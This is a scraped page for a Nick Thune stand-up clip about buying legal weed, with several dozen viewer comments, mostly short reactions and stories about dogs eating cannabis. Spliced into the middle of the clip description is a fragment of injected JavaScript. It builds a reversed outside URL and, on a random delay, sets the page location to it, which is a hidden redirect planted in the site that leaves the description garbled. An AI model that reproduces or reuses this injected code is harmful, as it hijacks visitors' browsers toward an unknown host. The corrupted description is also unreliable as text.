Nick Thune: Good Guy – Legal Weed – Uncensored

Nick Thune describes his first step down the road toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to becoming a good guy: buying marijuana legally.

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44 thoughts on “Nick Thune: Good Guy – Legal Weed – Uncensored”

  1. EABA EndAllBeAll says:

    Pretty funny stuff.

  2. Yasmin habibi says:

    Hey, this is REALLY good!

  3. Sarat Chandran Nair says:

    "…Susanne didn't care…"

  4. AnkurKumar Dubey says:

    That is a precious way of delivering comedy! Definitely gonna buy the special.

  5. daryl H says:

    my Mother once broke into my suitcase, and took enough LSD for 6 people … but, she was fine …

  6. jesse moore says:

    Suzannes a bitch.

  7. Christian Terrill says:

    Why would you waste money on the vet, that weed is not going to hurt the dog at all.

  8. Schoppe Petzer says:

    What a kind audience….I‘m five minutes in and believe they‘d clap for anything 🙂

  9. Yepac Shakur says:

    Yea my dog ate an 8th of mine and my wife was fucking hysterical. My dog wouldn’t stop drooling and was high as hell lol. Took her to the vet and they gave her meds and she was good to go in two days.

  10. DailyLGS says:

    I feel like this is not funny..

  11. Rob G says:

    Do you know who Jason Segel is?

  12. Jake Pin says:

    She didn’t recognize your name

  13. irie1tes says:

    Your wife sounds like a C word

  14. BTYF says:

    Funniest shit ever. Wish I was high while watching this

  15. b24harman says:

    20 minutes of a dog and weed story…jesus dude. You're 36 years old and that's the best you have for a show opener?

  16. Dopamine says:

    This sounds like a man who has just discovered confidence.

  17. Nick Byars says:

    Funny dude!!

  18. S B says:

    Reason number 34 to not have a "pet".

  19. Noah Konrad says:

    This guy for the mpst part sucked balls audience feels like actors sorry bud

  20. Juam Laris says:

    Nice and rofl

  21. squeezeslemons says:

    This whole bit is fucking gold

  22. adam clark says:

    Sooooo, chocolate is poison to dogs,,, and weed is really not good for them to eat,,, dog almost died

  23. Maggie E says:

    Oh my god you can put your stuff outside in California?!

  24. Baako Jernigan says:

    Here's to the good guy, he hooked it up

  25. Chiesel says:

    Very funny guy

  26. Chase Libby says:

    Homeless Adam Scott

  27. abigailschneider1 says:

    lol I'm more concerned about the chocolate in the brownie than the weed lol

  28. Sanivan says:

    Actualy funny

  29. Lucas Cruz says:

    I did not laugh. There was a couple of half smirks somewhere in there but no laughs. I'm an easy man to please. Fart jokes sometimes still make me laugh. This did not make me laugh. Joey Diaz makes me laugh and he doesn't even tell jokes. I'll give him another shot some other day but if I don't laugh, I'm done. I'm also constantly stoned all day. Every day. I'm not a tough audience. Basically, he had a head start and still not one laugh.

  30. Steve Harla says:

    My sister had a pug named Henry, about 10 years ago he got into her pill bottle with about 15 roaches in it cause the lid wasn't on and he finished them like an apple pie. Mikey got sober 2 days later, I'm pretty sure Henry was stoned till he passed 5 years ago, he lived a long good life, but I know the last 5 years of his life had to be the best. Always chill yet so damn happy and loving, didn't give a fuck about anything, I miss that dog.

  31. falloutmule says:

    This blows

  32. Jarvis Williams says:

    This guy is funny as shit!!…great story teller

  33. Christian9TNAT3 says:

    Chocolate wouldve killed that dog before the weed wouldve..

  34. Carlos Garza says:

    Funniest comedian I've seen in long time. Awesome work!

  35. Omegatide says:

    Why would you take your stoned dog to the vet? It makes 0 sense.

  36. silentdecay says:

    19minutes … oh RLMFAO

  37. TheWhiteDeath says:

    Not funny

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